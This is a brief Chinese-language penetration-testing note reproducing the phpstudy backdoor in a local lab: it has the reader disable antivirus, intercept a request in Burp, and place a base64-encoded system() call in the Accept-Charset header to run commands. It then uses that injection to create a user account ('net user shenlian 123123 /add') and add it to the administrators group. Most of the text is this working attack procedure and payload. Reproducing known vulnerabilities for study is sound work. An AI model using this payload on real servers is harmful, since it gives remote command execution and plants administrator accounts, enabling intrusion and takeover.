渗透笔记之phpstudy后门的一次复现
1.把杀毒软件关闭,防止把后门删除。
2.安装好phpstudy和BURP
3.运行phpstudy
4.打开cmd–执行命令Ipconfig–查找到无线网ip
5.打开自己搭建网站,输入无线ip地址10.2.96.58
6.打开BURP抓包
7.浏览器设置本机代理(谷歌)
8.浏览器重新发送请求,抓包
9.点击重发器
10.需要把两个空格删掉
11.添加Accept-Charset:system(“whoami”);并对system(“whoami”);进行base64编码
发送查看结果
12.使用命令添加用户(命令:net user 账号 密码 /add)
对system(“net user shenlian 123123 /add”); 进行base64编码
13.执行net user命令查看用户
14.执行 net localgroup administrators 账户名 /add 给予管理员权限